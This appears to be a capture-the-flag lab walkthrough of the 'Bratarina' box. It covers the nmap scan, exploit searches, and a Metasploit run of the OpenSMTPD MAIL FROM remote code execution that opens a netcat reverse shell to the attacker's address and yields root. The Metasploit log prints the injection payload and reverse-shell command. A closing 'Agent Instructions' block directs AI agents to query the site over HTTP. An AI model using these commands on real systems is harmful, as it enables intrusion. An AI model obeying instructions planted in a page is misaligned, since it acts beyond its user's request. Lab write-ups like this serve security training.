# Bratarina
## Intro
```
# Nmap 7.94SVN scan initiated Fri Mar 22 09:11:34 2024 as: nmap -sC -sV -vv -oA nmap/initial bratarina.pg
Nmap scan report for bratarina.pg (192.168.202.71)
Host is up, received echo-reply ttl 61 (0.040s latency).
Scanned at 2024-03-22 09:11:36 CDT for 51s
Not shown: 995 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 61 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 db:dd:2c:ea:2f:85:c5:89:bc:fc:e9:a3:38:f0:d7:50 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDJ0GZmmFtQUJbj2HgPsye2Xccyyh9mC8fsCwIivM4x3o3mwZDNi6g+Y6nIs5SuOJj2IpS+E9O5wB71MSIv7d7XYrd6paprfvnvMCyAQ9VTn8py6CQ/OsgeOITU+JnAxoe3WQklpyAVqhJ7ASqAInZF8oHDaebr6gBKEq4nkoLOtJSZeB8xWDHhbQZjG6AY81Y2mHPZH/LC4gSXpSmw+3h0zhlCN/kxeyhjrsrZqIVdKhg4emds8+gQyu1Wrz4AUUBGscI6Sh5rjImr+SC4rAGgn6N0MVPcZA1mS0JUplz758Y3YFXstqO2SdaHB/Qb50fkcpclcYKibSbCv5ZLNzOf
| 256 e3:b7:65:c2:a7:8e:45:29:bb:62:ec:30:1a:eb:ed:6d (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOWgZAzhJ+plc4Rk/YyGvQ1KOKK9j31ix1uCWIAirjnZS/lKwcvYrkG+lVsJRBnBYVA+67ILSJR2YNVz9uZshPE=
| 256 d5:5b:79:5b:ce:48:d8:57:46:db:59:4f:cd:45:5d:ef (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC2Z9krPXlbEN6Xl40sc3BiVLfhbtd+l5ZFNBKkF7pYT
25/tcp open smtp syn-ack ttl 61 OpenSMTPD
| smtp-commands: bratarina Hello bratarina.pg [192.168.45.152], pleased to meet you, 8BITMIME, ENHANCEDSTATUSCODES, SIZE 36700160, DSN, HELP
|_ 2.0.0 This is OpenSMTPD 2.0.0 To report bugs in the implementation, please contact bugs@openbsd.org 2.0.0 with full details 2.0.0 End of HELP info
53/tcp closed domain reset ttl 61
80/tcp open http syn-ack ttl 61 nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Page not found - FlaskBB
445/tcp open netbios-ssn syn-ack ttl 61 Samba smbd 4.7.6-Ubuntu (workgroup: COFFEECORP)
Service Info: Host: bratarina; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 22038/tcp): CLEAN (Timeout)
| Check 2 (port 53384/tcp): CLEAN (Timeout)
| Check 3 (port 21897/udp): CLEAN (Timeout)
| Check 4 (port 39979/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time:
| date: 2024-03-22T14:11:53
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: bratarina
| NetBIOS computer name: BRATARINA\x00
| Domain name: \x00
| FQDN: bratarina
|_ System time: 2024-03-22T10:11:52-04:00
|_clock-skew: mean: 1h20m02s, deviation: 2h18m35s, median: 1s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Mar 22 09:12:27 2024 -- 1 IP address (1 host up) scanned in 53.37 seconds
```
Open Ports
* 22/tcp - OpenSSH 7.6p1
* 25/tcp - OpenSMTPD
* 80/tcp - nginx 1.14.0
* 445/tcp - Samba smbd 4.7.6
OpenSMTPD Exploits
---------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------- ---------------------------------
OpenSMTPD - MAIL FROM Remote Code Execution (Metasploit) | linux/remote/48038.rb
OpenSMTPD - OOB Read Local Privilege Escalation (Metasploit) | linux/local/48185.rb
OpenSMTPD 6.4.0 < 6.6.1 - Local Privilege Escalation + Remote Code Execution | openbsd/remote/48051.pl
OpenSMTPD 6.6.1 - Remote Code Execution | linux/remote/47984.py
OpenSMTPD 6.6.3 - Arbitrary File Read | linux/remote/48139.c
OpenSMTPD < 6.6.3p1 - Local Privilege Escalation + Remote Code Execution | openbsd/remote/48140.c
---------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Samba Exploits
---------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------- ---------------------------------
Samba 3.0.10 (OSX) - 'lsa_io_trans_names' Heap Overflow (Metasploit) | osx/remote/16875.rb
Samba 3.0.10 < 3.3.5 - Format String / Security Bypass | multiple/remote/10095.txt
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit) | unix/remote/16320.rb
Samba 3.0.21 < 3.0.24 - LSA trans names Heap Overflow (Metasploit) | linux/remote/9950.rb
Samba 3.0.24 (Linux) - 'lsa_io_trans_names' Heap Overflow (Metasploit) | linux/remote/16859.rb
Samba 3.0.24 (Solaris) - 'lsa_io_trans_names' Heap Overflow (Metasploit) | solaris/remote/16329.rb
Samba 3.0.27a - 'send_mailslot()' Remote Buffer Overflow | linux/dos/4732.c
Samba 3.0.29 (Client) - 'receive_smb_raw()' Buffer Overflow (PoC) | multiple/dos/5712.pl
Samba 3.0.4 - SWAT Authorisation Buffer Overflow | linux/remote/364.pl
Samba 3.3.12 (Linux x86) - 'chain_reply' Memory Corruption (Metasploit) | linux_x86/remote/16860.rb
Samba 3.3.5 - Format String / Security Bypass | linux/remote/33053.txt
Samba 3.4.16/3.5.14/3.6.4 - SetInformationPolicy AuditEventsInfo Heap Overflow (Metasploit) | linux/remote/21850.rb
Samba 3.4.5 - Symlink Directory Traversal | linux/remote/33599.txt
Samba 3.4.5 - Symlink Directory Traversal (Metasploit) | linux/remote/33598.rb
Samba 3.4.7/3.5.1 - Denial of Service | linux/dos/12588.txt
Samba 3.5.0 - Remote Code Execution | linux/remote/42060.py
Samba 3.5.0 < 4.4.14/4.5.10/4.6.4 - 'is_known_pipename()' Arbitrary Module Load (Metasploit) | linux/remote/42084.rb
Samba 3.5.11/3.6.3 - Remote Code Execution | linux/remote/37834.py
Samba 3.5.22/3.6.17/4.0.8 - nttrans Reply Integer Overflow | linux/dos/27778.txt
## Initial Foothold
```
msf6 exploit(unix/smtp/opensmtpd_mail_from_rce) > show options
Module options (exploit/unix/smtp/opensmtpd_mail_from_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
RCPT_TO root yes Valid mail recipient
RHOSTS bratarina.pg yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 25 yes The target port (TCP)
Payload options (cmd/unix/reverse_netcat):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.45.152 yes The listen address (an interface may be specified)
LPORT 80 yes The listen port
Exploit target:
Id Name
-- ----
0 OpenSMTPD 6.4.0 - 6.6.1
View the full module info with the info, or info -d command.
msf6 exploit(unix/smtp/opensmtpd_mail_from_rce) > run
[*] Started reverse TCP handler on 192.168.45.152:80
[*] 192.168.202.71:25 - Running automatic check ("set AutoCheck false" to disable)
[!] 192.168.202.71:25 - The service is running, but could not be validated.
[*] 192.168.202.71:25 - Connecting to OpenSMTPD
[*] 192.168.202.71:25 - Saying hello and sending exploit
[*] 192.168.202.71:25 - Expecting: /220.*OpenSMTPD/
[*] 192.168.202.71:25 - Sending: HELO Fu9Gr5sSrBNw0zZ2a
[*] 192.168.202.71:25 - Expecting: /250.*pleased to meet you/
[*] 192.168.202.71:25 - Sending: MAIL FROM:<;for l in M Q e 4 o v 1 D j E T t 8 M;do read l;done;sh;exit 0;>
[*] 192.168.202.71:25 - Expecting: /250.*Ok/
[*] 192.168.202.71:25 - Sending: RCPT TO:
[*] 192.168.202.71:25 - Expecting: /250.*Recipient ok/
[*] 192.168.202.71:25 - Sending: DATA
[*] 192.168.202.71:25 - Expecting: /354 Enter mail.*itself/
[*] 192.168.202.71:25 - Sending:
#
#
#
#
#
#
#
#
#
#
#
#
#
#
mkfifo /tmp/fnmudoa; nc 192.168.45.152 80 0/tmp/fnmudoa 2>&1; rm /tmp/fnmudoa
[*] 192.168.202.71:25 - Sending: .
[*] 192.168.202.71:25 - Expecting: /250.*Message accepted for delivery/
[*] 192.168.202.71:25 - Sending: QUIT
[*] 192.168.202.71:25 - Expecting: /221.*Bye/
[*] Command shell session 1 opened (192.168.45.152:80 -> 192.168.202.71:42038) at 2024-03-22 10:06:00 -0500
whoami
root
pwd
/root
ls -la
total 28
drwx------ 4 root root 4096 Mar 22 10:08 .
drwxr-xr-x 23 root root 4096 Jul 6 2020 ..
-rw------- 1 root root 0 Jul 9 2020 .bash_history
-rw-r--r-- 1 root root 3106 Apr 9 2018 .bashrc
drwx------ 2 root root 4096 Jul 6 2020 .cache
drwx------ 3 root root 4096 Jul 6 2020 .gnupg
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 33 Mar 22 10:08 proof.txt
cat proof.txt
470915275876f89210c9911a6fa0c973
```
## Privilege Escalation
No privilege escalation required as initial access gained by exploiting OpenSMTPD yielded root access.
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://walkthroughs.cyanidesecurity.com/proving-grounds/bratarina.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.